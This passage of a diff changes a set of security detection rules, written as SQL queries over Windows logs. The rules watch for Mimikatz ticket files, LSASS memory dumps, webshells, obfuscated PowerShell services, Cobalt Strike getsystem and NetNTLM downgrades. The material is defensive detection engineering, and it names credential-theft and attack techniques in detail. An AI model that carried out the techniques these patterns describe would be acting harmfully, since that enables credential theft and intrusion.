"attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 
'AAAAAAA')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": 
"Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": 
"file_event_win_hktl_dumpert.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", - "author": "frack113", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], 
"falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE 
TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." 
+ "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": 
"Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "System administrators managing certififcates." 
+ "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the 
system policy", + "author": "frack113", "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", - "status": "test", - "description": "Detects the creation of a macro file for Outlook.", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 
'%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "Addition of legitimate plugins" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR 
TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, 
Florian Roth", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "status": "test", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR 